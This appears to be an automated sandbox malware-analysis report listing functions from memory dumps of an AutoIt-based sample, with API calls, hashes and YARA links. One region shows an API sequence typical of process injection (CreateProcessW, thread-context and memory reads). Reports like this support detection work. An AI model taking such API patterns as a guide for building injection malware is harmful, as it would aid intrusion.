                                                  Function 00BC4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID: EA06
                                                  • API String ID: 4104443479-3962188686
                                                  • Opcode ID: ca73a1d9c2036a1f17050aa16c27b94cd896ffb29882a2671e4752dd529dd9c3
                                                  • Instruction ID: b79754562fcecdfe15c4a77061406ff7ea281fddcafd967a5044094feb160ef7
                                                  • Opcode Fuzzy Hash: ca73a1d9c2036a1f17050aa16c27b94cd896ffb29882a2671e4752dd529dd9c3
                                                  • Instruction Fuzzy Hash: C0412921A0415867DF21AB5488B1FBF7FE2DB45310F2844FDED879B282D7209F4483A1
                                                  Function 00BC4DDD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00BC4BEF
                                                    • Part of subcall function 00BE525B: __wfsopen.LIBCMT ref: 00BE5266
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,(l,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4E0F
                                                    • Part of subcall function 00BC4B6A: FreeLibrary.KERNEL32(00000000), ref: 00BC4BA4
                                                    • Part of subcall function 00BC4C70: _memmove.LIBCMT ref: 00BC4CBA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                  • String ID: (l
                                                  • API String ID: 1396898556-844116408
                                                  • Opcode ID: 30ea5893b93cb982fd012ce35f0df23db726b80313dbae8b7c236d822d5e3e60
                                                  • Instruction ID: 90ad57f8e04270945949652dc16d8a8cda2e233938e354d0d89dfca51f5c7adf
                                                  • Opcode Fuzzy Hash: 30ea5893b93cb982fd012ce35f0df23db726b80313dbae8b7c236d822d5e3e60
                                                  • Instruction Fuzzy Hash: 2311A731640206ABCF15AFB0C866FAE77E5EF44750F1088ADF941A7181DB719F059751
                                                  Function 00BC7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                  • Instruction ID: e5295fa5b99ea68872db5f8bcb209324b416a354b1138bb9a7994b1633be1983
                                                  • Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                  • Instruction Fuzzy Hash: 7B314DB1644606AFC704DF69C8D1E69B3E9FF4832071586ADE919CB291EF70E960CB90
                                                  Function 00BE0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BE571C: __FF_MSGBANNER.LIBCMT ref: 00BE5733
                                                    • Part of subcall function 00BE571C: __NMSG_WRITE.LIBCMT ref: 00BE573A
                                                    • Part of subcall function 00BE571C: RtlAllocateHeap.NTDLL(00ED0000,00000000,00000001,00000000,?,?,?,00BE0DD3,?), ref: 00BE575F
                                                  • std::exception::exception.LIBCMT ref: 00BE0DEC
                                                  • __CxxThrowException@8.LIBCMT ref: 00BE0E01
                                                    • Part of subcall function 00BE859B: RaiseException.KERNEL32(?,?,?,00C79E78,00000000,?,?,?,?,00BE0E06,?,00C79E78,?,00000001), ref: 00BE85F0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 3902256705-0
                                                  • Opcode ID: 19f4680229710c32bacedfff8c6dc6a58e22817a8afcdd88c0ce5de4b8fb05a0
                                                  • Instruction ID: 9836da72caac45151dd7b0608f412508bae3362656ac242dd1dff98c40bfd7d7
                                                  • Opcode Fuzzy Hash: 19f4680229710c32bacedfff8c6dc6a58e22817a8afcdd88c0ce5de4b8fb05a0
                                                  • Instruction Fuzzy Hash: 7BF0F47580025A66CB10BAAAEC419DE77FCDF01311F1044B5FD0896281DFB09AC4D2D5
                                                  Function 00BE53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BE8B28: __getptd_noexit.LIBCMT ref: 00BE8B28
                                                  • __lock_file.LIBCMT ref: 00BE53EB
                                                    • Part of subcall function 00BE6C11: __lock.LIBCMT ref: 00BE6C34
                                                  • __fclose_nolock.LIBCMT ref: 00BE53F6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                  • String ID:
                                                  • API String ID: 2800547568-0
                                                  • Opcode ID: f54cc31bb2e55ca9128f389338eb8ef7760de7373cccc946ccf3cdf3fbbffe98
                                                  • Instruction ID: 0016d79a963477972b5d9dd5d667c66ee89b2ed5259c149579865d5a8561cae8
                                                  • Opcode Fuzzy Hash: f54cc31bb2e55ca9128f389338eb8ef7760de7373cccc946ccf3cdf3fbbffe98
                                                  • Instruction Fuzzy Hash: FCF09671800E849AD7206B7798467AD77E06F41379F208199A42AAB1C1CFBC89415B56
                                                  Function 00F5B24D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00F5BA0B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F5BAA1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F5BAC3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_f59000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                  • Instruction ID: 59771b5411d2485ae6c5b2d0d8d7ea713525d0fd73c7483986cd90de85a5cbdc
                                                  • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                  • Instruction Fuzzy Hash: 9812EE24E18658C6EB24DF60D8507DEB232EF68301F1090E9910DEB7A5E77A4F85CF5A
                                                  Function 00BC750F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 51e497d898cec5db7a9700977d63082d109c780e0310b9a0f10f4dde0ab95772
                                                  • Instruction ID: c3cb82c329fa1dfe12d1b7089aa9f4ab39fba435703a7f84197e06798b473cf7
                                                  • Opcode Fuzzy Hash: 51e497d898cec5db7a9700977d63082d109c780e0310b9a0f10f4dde0ab95772
                                                  • Instruction Fuzzy Hash: 21316B79648A029FC724DF19C490E21F7E0FF19310B14C5AEE98A8B791EB70E881CF94
                                                  Function 00BE0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: bcc84ad7a2988b1d5a4934c102cb542f39f6792d95fd3dea0a70ce77a6aae57f
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: 4A31E070A101469BC718EF4AC4C4A69FBE6FB59300B7486E5E80ACB351DBB1EDC1DB81
                                                  Function 00BFFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 4764e68cb8773ab8d92be972de21c7038d40a4a6e442de3c882cd5a8f64c988f
                                                  • Instruction ID: af4fdb34b593092429390d939adf882b8c1c5fd0998a7d5b883ce143c74eedb9
                                                  • Opcode Fuzzy Hash: 4764e68cb8773ab8d92be972de21c7038d40a4a6e442de3c882cd5a8f64c988f
                                                  • Instruction Fuzzy Hash: FF41F5746043459FDB14DF14C498F2ABBE0FF49318F1988ACE99A8B362C772E845CB52
                                                  Function 00BC7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 52ba1f1a0518798ac5ee20b84f00d66bad25e279fa6a0005188d8c73ec6f62bf
                                                  • Instruction ID: 56607065e946b61e2388e8b3771790d675bded7bf49fb22494cb1068c33d5cda
                                                  • Opcode Fuzzy Hash: 52ba1f1a0518798ac5ee20b84f00d66bad25e279fa6a0005188d8c73ec6f62bf
                                                  • Instruction Fuzzy Hash: F8212472A04A08EBDB148F25E881B7D7BF4FB14350F2084AEF99AC60A0EB70C5D4CB05
                                                  Function 00BFFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: c53057f4e38b935b28ae632d8bc88d30eb566187eda18c302aaa8208f249618d
                                                  • Instruction ID: 06957f2c24b5c0f5312aa4ea74fe29831b923e4b93c6d62866d4c7bed170f94c
                                                  • Opcode Fuzzy Hash: c53057f4e38b935b28ae632d8bc88d30eb566187eda18c302aaa8208f249618d
                                                  • Instruction Fuzzy Hash: 4D21FFB49083459FDB14DF24C484F1ABBE0BF88314F0589ACE99A57762D731E845CB92
                                                  Function 00BE4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __lock_file.LIBCMT ref: 00BE48A6
                                                    • Part of subcall function 00BE8B28: __getptd_noexit.LIBCMT ref: 00BE8B28
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2597487223-0
                                                  • Opcode ID: 6f49fe56bc69af1e3ee04824d176eca3335aed9f5efb4e7ede668a15304d87c7
                                                  • Instruction ID: 3efc4f6eb0d50cefcad659ee26ac5c1d80872f1d091956fa1acf39615d01e2be
                                                  • Opcode Fuzzy Hash: 6f49fe56bc69af1e3ee04824d176eca3335aed9f5efb4e7ede668a15304d87c7
                                                  • Instruction Fuzzy Hash: A3F0C231900AC9EBDF11AFB68C067AE37E1EF00325F158594F42CAA1D2CB788D51DB51
                                                  Function 00BC4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,(l,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4E7E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 8362d95aeac467ffef527436680c98fd710c9051d9de433038d63f08a1294a20
                                                  • Instruction ID: de6fb7b658db79920da7f5f522ef75e5365d85454bf9988b549f885b59214e82
                                                  • Opcode Fuzzy Hash: 8362d95aeac467ffef527436680c98fd710c9051d9de433038d63f08a1294a20
                                                  • Instruction Fuzzy Hash: 1DF01571505712CFCB389F64E4A4E56BBE1FF143293218ABEE1DA82620C7329940DF40
                                                  Function 00BE0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BE07B0
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_memmove
                                                  • String ID:
                                                  • API String ID: 2514874351-0
                                                  • Opcode ID: 14c959d0c4b8455b6f4f531d3ee936d3e4dc9b7c355e7d2de823058a0b2ff9d9
                                                  • Instruction ID: d23bb7d3305199108a97aaa8493705144499058cb20176a740af78c2b65a8f17
                                                  • Opcode Fuzzy Hash: 14c959d0c4b8455b6f4f531d3ee936d3e4dc9b7c355e7d2de823058a0b2ff9d9
                                                  • Instruction Fuzzy Hash: 2DE086369451285BC720965C9C05FEA77EDDB896A0F0441F5FD08D7204D9A1AC8186D0
                                                  Function 00BE525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __wfsopen
                                                  • String ID:
                                                  • API String ID: 197181222-0
                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction ID: d7b2d29bafdc039da4d4e390924143328bc3a8ddec1a06583fd44b6f484afbc2
                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction Fuzzy Hash: E6B0927644020C77CE112A82EC02A493B5D9B41768F408060FB0C1C162A673A6649A89
                                                  Function 00F5C24C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 00F5C261
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_f59000_new.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                  • Instruction ID: adb694554c0b54ae4cd8db700febf01e9f8f22e0a7e88d104fbd422abf357a0c
                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                  • Instruction Fuzzy Hash: D1E09A7494020DAFDB00EFB4D54969E7BB4EF05302F1005A1FE0596680DA309A549A62
                                                  Function 00F5C250 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 00F5C261
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_f59000_new.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction ID: d72b334453a187222d021287b2aad888074b08b8d0e6af4eed06ea7a1bc476ee
                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction Fuzzy Hash: C7E0E67494020DDFDB00EFF4D54969E7FF4EF04302F100161FD05D2280D6309D509A62

                                                  Non-executed Functions

                                                  Function 00C4CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C4CB37
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C4CB95
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C4CBD6
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C4CC00
                                                  • SendMessageW.USER32 ref: 00C4CC29
                                                  • _wcsncpy.LIBCMT ref: 00C4CC95
                                                  • GetKeyState.USER32(00000011), ref: 00C4CCB6
                                                  • GetKeyState.USER32(00000009), ref: 00C4CCC3
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C4CCD9
                                                  • GetKeyState.USER32(00000010), ref: 00C4CCE3
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C4CD0C
                                                  • SendMessageW.USER32 ref: 00C4CD33
                                                  • SendMessageW.USER32(?,00001030,?,00C4B348), ref: 00C4CE37
                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C4CE4D
                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C4CE60
                                                  • SetCapture.USER32(?), ref: 00C4CE69
                                                  • ClientToScreen.USER32(?,?), ref: 00C4CECE
                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C4CEDB
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C4CEF5
                                                  • ReleaseCapture.USER32 ref: 00C4CF00
                                                  • GetCursorPos.USER32(?), ref: 00C4CF3A
                                                  • ScreenToClient.USER32(?,?), ref: 00C4CF47
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C4CFA3
                                                  • SendMessageW.USER32 ref: 00C4CFD1
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C4D00E
                                                  • SendMessageW.USER32 ref: 00C4D03D
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C4D05E
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C4D06D
                                                  • GetCursorPos.USER32(?), ref: 00C4D08D
                                                  • ScreenToClient.USER32(?,?), ref: 00C4D09A
                                                  • GetParent.USER32(?), ref: 00C4D0BA
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C4D123
